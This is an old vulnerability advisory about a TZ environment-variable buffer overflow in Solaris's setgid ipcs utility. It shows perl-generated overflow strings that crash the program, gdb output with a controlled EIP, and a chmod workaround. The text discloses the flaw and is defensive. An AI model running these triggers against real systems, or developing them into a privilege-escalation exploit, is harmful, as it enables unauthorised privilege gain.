COMMAND

    ipcs

SYSTEMS AFFECTED

    Solaris 7 x86 (Other Solaris versions are most likely affected also)

PROBLEM

    Marc  Maiffret  found  following.   He  has  discovered  a  buffer
    overflow in  the /usr/bin/i86/ipcs  utility provided  with Solaris
    7.   The  problem  exists  in  the  parsing  of  the TZ (TIMEZONE)
    environment  variable.   By   exploiting  this  vulnerability   an
    attacker can  achieve local  sys group  privileges.   IPCS is used
    for gathering  information on  active inter-process  communication
    facilities.   Exploitation  of  this  vulnerability  would be very
    difficult, but not impossible.

        bash-2.03$ TZ=`perl -e 'print "A"x1035'`
        bash-2.03$ /usr/bin/i86/ipcs
        IPC status from as of Wed Apr 11 17:18:59 [buffer] 2001
        Message Queue facility inactive.
        T ID KEY MODE OWNER GROUP
        Shared Memory:
        m 0 0x500004d3 --rw-r--r-- root root
        Semaphore facility inactive.
        Segmentation Fault (core dumped)

    Note: [buffer] is any 1036 (or so) character string. A's...

        bash-2.03$ su root
        Password:
        # gdb /usr/bin/i86/ipcs core
        GNU gdb 5.0
        Copyright 2000 Free Software Foundation, Inc.
        GDB is free software, covered by the GNU General Public License, and you are
        <snip>
        #0 0x41414141 in ?? ()
        (gdb) info reg eip
        eip 0x41414141 0x41414141
        (gdb)

    Solaris 7 on sparc 64bits crashes but you need to fill the  buffer
    with  more  than  1200  bytes.   The  segfault  occurs  on  a ldsb
    instruction, so we don't know if its feasible to exploit this bug.

    Seems Solaris  8 has  larger buffer  (guess is  2k), yet  it still
    overflows:

        Solaris 8, 64bit:
        [root@ias1 /root]# uname -a
        SunOS ias1 5.8 Generic_108528-06 sun4u sparc SUNW,UltraAX-i2
        [root@ias1 /root]# isainfo -b
        64
        [root@ias1 /root]# export TZ=3D`/usr/bin/perl -e 'print "A"x2107'`
        [root@ias1 /root]# ipcs
        Segmentation Fault (core dumped)

        Solaris 8, 32bit:
        [root@nite /root]# uname -a
        SunOS nite 5.8 Generic_108528-06 sun4u sparc SUNW,Ultra-5_10
        [root@nite /root]# isainfo -b
        32
        [root@nite /root]# export TZ=3D`/usr/bin/perl -e 'print "A"x2107'`
        [root@nite /root]# ipcs
        Segmentation Fault

        Solaris 7, 64bit:
        [root@dwhs /root]# uname -a
        SunOS dwhs 5.7 Generic_106541-15 sun4u sparc SUNW,Ultra-Enterprise
        [root@dwhs /root]# isainfo  -b
        64
        [root@dwhs /root]# export TZ=3D`/usr/local/bin/perl -e 'print "A"x2107'`
        [root@dwhs /root]# ipcs
        Segmentation Fault

SOLUTION

    Sun Microsystems has been  contacted.  They are  currently working
    on patches  for this  and other  related vulnerabilities  eEye has
    discovered.

    Workaround:

        chmod -s /usr/bin/i86/ipcs

    This will remove the setgid bit from /usr/bin/i86/ipcs,  therefore
    if someone does exploit this vulnerability, they won't gain higher
    privileges.

    Knowdays  people  are  using  wrappers  to  prevent  this  kind of
    exploits since they can't afford to wait for Sun's patches.